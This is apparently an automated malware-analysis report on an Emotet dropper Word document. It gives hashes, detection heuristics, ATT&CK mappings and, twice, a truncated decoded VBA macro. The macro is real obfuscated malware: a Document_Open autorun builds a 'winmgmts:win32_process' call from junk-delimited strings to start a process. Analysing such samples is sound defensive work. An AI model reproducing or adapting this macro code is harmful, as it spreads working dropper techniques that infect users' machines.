Emotet Office (OLE) malware analysis — malicious · c09dc55ea01177a3

MALICIOUS

Office (OLE)

251.5 KB Created: 2020-01-17 18:06:00 Authoring application: Microsoft Office Word First seen: 2020-09-15

MD5: aadac1a834cfb57e37c56d634f433cdb SHA-1: d0ba55e22a0a5e0a5a616297066ff20c12110534 SHA-256: c09dc55ea01177a351b6c47a4dbda312eecfd3843ef4ea806db48c5ff506bb44

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute automatically. The ClamAV detection and heuristic firings strongly indicate this is an Emotet dropper. The macro likely attempts to download and execute a second-stage payload, a common Emotet behavior, although the script is heavily obfuscated and truncated.

Heuristics 6

ClamAV: Doc.Dropper.Emotet-7544766-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Emotet-7544766-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7882 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7882 bytes
SHA-256: `a4505d9aa099025ee94bf9c9577d50ea15859cdc5bb7868a58be88c1b6831ca1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Vycejmzr" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() Tbcepkcgnhpwx End Sub Attribute VB_Name = "Bimqxgzblyrp" Attribute VB_Base = "0{BF8C4410-2A64-4A43-B608-1E5B4D4FB943}{A247CEC1-BA27-462C-A0B3-0210073727AD}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Flijvcefzoj" Function Pitxyglphi() Select Case Ewontzdrytyk Case 5815 Dwkkvvkxhfhwq = Log(3331) Iamzmqhgtwnq = 4 Odmxxoop = CSng(trrD0) Case Kkhoifxibxqsm Iwproifnwsc = ChrW(RSd) Tngsyoobjsyny = 472 Zkvrbhpsyxn = Cos(rfTD3Iu) Case 5 Xkwgkzpnr = 76 Yvozerdpdqnl = Atn(3391) Tqevhvkxje = Sin(Rdzpbimbtftpo) End Select Hnkanudydg = ChrW(wdKeyP) Select Case Nabshejvqztq Case 5815 Izpjwccun = Log(3331) Gistxlbg = 4 Wiqtrgvybqncu = CSng(trrD0) Case Qefvrtmfp Rbtoskcgmqzqf = ChrW(RSd) Vlepdotnh = 472 Kqfjdarvoufm = Cos(rfTD3Iu) Case 5 Zomqroaz = 76 Baayhyomixzla = Atn(3391) Yzjhmpygme = Sin(Wprulgihc) End Select Drmrfxlv = Hnkanudydg + Bimqxgzblyrp.Banzydziriljk + Bimqxgzblyrp.Svndpgudl Select Case Aozvwrrckhotr Case 5815 Ivhqmzaug = Log(3331) Pwtivkfqxyx = 4 Euqlbhgalz = CSng(trrD0) Case Wfhyzutbfc Bmeobcjkcv = ChrW(RSd) Jpsympdwoaye = 472 Xeergcahjpds = Cos(rfTD3Iu) Case 5 Qugbtppjbu = 76 Yxubnzqjefg = Atn(3391) Jrcfdvtqtgt = Sin(Kicncjcqdcmib) End Select losd = Bimqxgzblyrp.Cvlpoddz.GroupName Yayiwzyefmtww = Split(Drmrfxlv + LTrim(LTrim(losd)), "//====dsfnnJJJsm388//=") Select Case Ynahheexq Case 5815 Qznnixxbsdiac = Log(3331) Ooofayrhj = 4 Fvdtifgijri = CSng(trrD0) Case Irvzeqmx Qpjlcxyrekurb = ChrW(RSd) Uduuhrfflxjds = 472 Rpowndyuelkz = Cos(rfTD3Iu) Case 5 Hqpxajmrdjikj = 76 Sugoltfcekv = Atn(3391) Qjxrbhdgtf = Sin(Gzlfocuaglqe) End Select Pitxyglphi = Dkmsucacshca + Join(Yayiwzyefmtww, "") + Dkmsucacshca Select Case Zncvcdsoiodt Case 5815 Pvpsbnpj = Log(3331) Cpbourmj = 4 Rdlqgnbqw = CSng(trrD0) Case Ckpudlbodgqaa Cetqbuzklm = ChrW(RSd) Lnlymjeaemuqg = 472 Qabdkwulxwgc = Cos(rfTD3Iu) Case 5 Aditmqar = 76 Qwthpkcj = Atn(3391) Ijkizcqcocghc = Sin(Imxuvvzt) End Select End Function Function Tbcepkcgnhpwx() d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Bimqxgzblyrp.Fmgsnpdkhc + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss" Select Case Utqslcezgnb Case 5815 Qqvtlseeyqmh = Log(3331) Zahsqrozoswd = 4 Rtyyyjsu = CSng(trrD0) Case Qfgjwcdkbhfyy Seqbdxifcm = ChrW(RSd) Ojbcfblclkfd = 472 Lcfwtvenfeb = Cos(rfTD3Iu) Case 5 Yiaewqjpbafax = 76 Ziynopmfzftj = Atn(3391) Dwamfmtl = Sin(Mczjczwvjm) End Select E = "//====dsfnnJJJsm388//=" Select Case Kuffqeeauqol Case 5815 Yqhqqkta = Log(3331) Iukdcjkfyb = 4 Mltvvokqfqgn = CSng(trrD0) Case Misrbkwswvt Lginjvfdwwupe = ChrW(RSd) Hsnxknwbn = 472 Uwupycuq = ... (truncated)

SHA-256: a4505d9aa099025ee94bf9c9577d50ea15859cdc5bb7868a58be88c1b6831ca1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Vycejmzr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Tbcepkcgnhpwx
End Sub

Attribute VB_Name = "Bimqxgzblyrp"
Attribute VB_Base = "0{BF8C4410-2A64-4A43-B608-1E5B4D4FB943}{A247CEC1-BA27-462C-A0B3-0210073727AD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Flijvcefzoj"
Function Pitxyglphi()
   Select Case Ewontzdrytyk
      Case 5815
         Dwkkvvkxhfhwq = Log(3331)
         Iamzmqhgtwnq = 4
         Odmxxoop = CSng(trrD0)
      Case Kkhoifxibxqsm
         Iwproifnwsc = ChrW(RSd)
         Tngsyoobjsyny = 472
         Zkvrbhpsyxn = Cos(rfTD3Iu)
      Case 5
         Xkwgkzpnr = 76
         Yvozerdpdqnl = Atn(3391)
         Tqevhvkxje = Sin(Rdzpbimbtftpo)
End Select
Hnkanudydg = ChrW(wdKeyP)
   Select Case Nabshejvqztq
      Case 5815
         Izpjwccun = Log(3331)
         Gistxlbg = 4
         Wiqtrgvybqncu = CSng(trrD0)
      Case Qefvrtmfp
         Rbtoskcgmqzqf = ChrW(RSd)
         Vlepdotnh = 472
         Kqfjdarvoufm = Cos(rfTD3Iu)
      Case 5
         Zomqroaz = 76
         Baayhyomixzla = Atn(3391)
         Yzjhmpygme = Sin(Wprulgihc)
End Select
Drmrfxlv = Hnkanudydg + Bimqxgzblyrp.Banzydziriljk + Bimqxgzblyrp.Svndpgudl
   Select Case Aozvwrrckhotr
      Case 5815
         Ivhqmzaug = Log(3331)
         Pwtivkfqxyx = 4
         Euqlbhgalz = CSng(trrD0)
      Case Wfhyzutbfc
         Bmeobcjkcv = ChrW(RSd)
         Jpsympdwoaye = 472
         Xeergcahjpds = Cos(rfTD3Iu)
      Case 5
         Qugbtppjbu = 76
         Yxubnzqjefg = Atn(3391)
         Jrcfdvtqtgt = Sin(Kicncjcqdcmib)
End Select
losd = Bimqxgzblyrp.Cvlpoddz.GroupName
Yayiwzyefmtww = Split(Drmrfxlv + LTrim(LTrim(losd)), "//====dsfnnJJJsm388//=")
   Select Case Ynahheexq
      Case 5815
         Qznnixxbsdiac = Log(3331)
         Ooofayrhj = 4
         Fvdtifgijri = CSng(trrD0)
      Case Irvzeqmx
         Qpjlcxyrekurb = ChrW(RSd)
         Uduuhrfflxjds = 472
         Rpowndyuelkz = Cos(rfTD3Iu)
      Case 5
         Hqpxajmrdjikj = 76
         Sugoltfcekv = Atn(3391)
         Qjxrbhdgtf = Sin(Gzlfocuaglqe)
End Select
Pitxyglphi = Dkmsucacshca + Join(Yayiwzyefmtww, "") + Dkmsucacshca
   Select Case Zncvcdsoiodt
      Case 5815
         Pvpsbnpj = Log(3331)
         Cpbourmj = 4
         Rdlqgnbqw = CSng(trrD0)
      Case Ckpudlbodgqaa
         Cetqbuzklm = ChrW(RSd)
         Lnlymjeaemuqg = 472
         Qabdkwulxwgc = Cos(rfTD3Iu)
      Case 5
         Aditmqar = 76
         Qwthpkcj = Atn(3391)
         Ijkizcqcocghc = Sin(Imxuvvzt)
End Select
End Function
Function Tbcepkcgnhpwx()
d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Bimqxgzblyrp.Fmgsnpdkhc + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"
   Select Case Utqslcezgnb
      Case 5815
         Qqvtlseeyqmh = Log(3331)
         Zahsqrozoswd = 4
         Rtyyyjsu = CSng(trrD0)
      Case Qfgjwcdkbhfyy
         Seqbdxifcm = ChrW(RSd)
         Ojbcfblclkfd = 472
         Lcfwtvenfeb = Cos(rfTD3Iu)
      Case 5
         Yiaewqjpbafax = 76
         Ziynopmfzftj = Atn(3391)
         Dwamfmtl = Sin(Mczjczwvjm)
End Select
E = "//====dsfnnJJJsm388//="
   Select Case Kuffqeeauqol
      Case 5815
         Yqhqqkta = Log(3331)
         Iukdcjkfyb = 4
         Mltvvokqfqgn = CSng(trrD0)
      Case Misrbkwswvt
         Lginjvfdwwupe = ChrW(RSd)
         Hsnxknwbn = 472
         Uwupycuq = 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.